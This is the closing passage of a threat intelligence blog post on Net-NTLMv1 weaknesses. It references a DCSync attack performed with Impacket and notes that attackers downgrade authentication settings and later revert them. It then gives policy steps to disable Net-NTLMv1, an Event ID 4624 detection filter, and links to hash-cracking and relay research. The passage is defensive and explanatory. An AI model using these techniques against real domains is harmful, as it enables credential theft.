baseline;">Impacket</span></a><span style="vertical-align: baseline;"> toolsuite and is shown in Figure 10.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/net-ntlmv1-fig10.max-1000x1000.png" alt="DCSync attack performed"> </a> <figcaption class="article-image__caption "><p data-block-key="b71de">Figure 10: DCSync attack performed</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Remediation</span></h3> <p><span style="vertical-align: baseline;">Organizations should immediately disable the use of Net-NTLMv1. </span></p> <h4><span style="vertical-align: baseline;">Local Computer Policy</span></h4> <p><span style="vertical-align: baseline;">"Local Security Settings" &gt; "Local Policies" &gt; "Security Options" &gt; “Network security: LAN Manager authentication level" &gt; "Send NTLMv2 response only".</span></p> <h4><span style="vertical-align: baseline;">Group Policy</span></h4> <p><span style="vertical-align: baseline;">"Computer Configuration" &gt; "Policies" &gt; "Windows Settings" &gt; "Security Settings" &gt; "Local Policies" &gt; "Security Options" &gt; "Network Security: LAN Manager authentication level" &gt; "Send NTLMv2 response only"</span></p> <p><span style="vertical-align: baseline;">As these are local to the computer configurations, </span><a href="https://www.ibm.com/think/x-force/remotemonologue-weaponizing-dcom-ntlm-authentication-coercions" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">attackers can</span></a><span style="vertical-align: baseline;"> </span><a href="http://r-tec.net/r-tec-blog-netntlmv1-downgrade-to-compromise.html" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">and</span></a><span style="vertical-align: baseline;"> </span><a href="https://www.praetorian.com/blog/ntlmv1-vs-ntlmv2/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">have</span></a><span style="vertical-align: baseline;"> set the configuration to a vulnerable state to then fix the configuration after their attacks have completed with local administrative access. Monitoring and alerting of when and where Net-NTLMv1 is used is needed in addition to catching these edge cases.</span></p> <p><span style="vertical-align: baseline;">Filter Event Logs for Event ID 4624: "An Account was successfully logged on." &gt; "Detailed Authentication Information" &gt; "Authentication Package" &gt; "Package Name (NTLM only)", if "LM" or "NTLMv1" is the value of this attribute, LAN Manager or Net-NTLMv1 was used.</span></p> <h3><span style="vertical-align: baseline;">Related Reading</span></h3> <p><span style="vertical-align: baseline;">This project was inspired by and referenced the following research published to blogs, social media, and code repositories.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><a href="https://www.youtube.com/watch?v=gkPvZDcrLFk" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">https://www.youtube.com/watch?v=gkPvZDcrLFk</span></a></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><a href="https://crack.sh/netntlm/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">https://crack.sh/netntlm/</span></a></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><a href="https://hashcat.net/forum/thread-9009.html" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">https://hashcat.net/forum/thread-9009.html</span></a></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/hash-capture/#capturing-and-cracking-net-ntlmv1ntlmv1-hashestokens" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">https://swisskyrepo.github.io/InternalAllTheThings/active-directory/hash-capture/#capturing-and-cracking-net-ntlmv1ntlmv1-hashestokens</span></a></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><a href="https://en.hackndo.com/ntlm-relay/#stop-using-ntlmv1" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">https://en.hackndo.com/ntlm-relay/#stop-using-ntlmv1</span></a></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><a href="https://www.praetorian.com/blog/ntlmv1-vs-ntlmv2/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">https://www.praetorian.com/blog/ntlmv1-vs-ntlmv2/</span></a></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><a href="https://trustedsec.com/blog/practical-attacks-against-ntlmv1" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">https://trustedsec.com/blog/practical-attacks-against-ntlmv1</span></a></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><a href="https://github.com/NotMedic/NetNTLMtoSilverTicket" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">https://github.com/NotMedic/NetNTLMtoSilverTicket</span></a></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><a href="https://x.com/jeffmcjunkin/status/1575515827880665088?lang=en" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">https://x.com/jeffmcjunkin/status/1575515827880665088</span></a></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><a href="https://shuck.sh/get-shucking.php" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">https://shuck.sh/get-shucking.php</span></a></p> </li> </ul> <h3><span style="vertical-align: baseline;">Acknowledgements</span></h3> <p><span style="vertical-align: baseline;">Thank you to everyone who helped make this blog post possible, including but not limited to Chris King and Max Gruenberg.</span></p></div>Thu, 15 Jan 2026 14:00:00 +0000https://cloud.google.com/blog/topics/threat-intelligence/net-ntlmv1-deprecation-rainbow-tables/Threat IntelligencearticleGooglehttps://cloud.google.com/blog/topics/threat-intelligence/net-ntlmv1-deprecation-rainbow-tables/Mandiant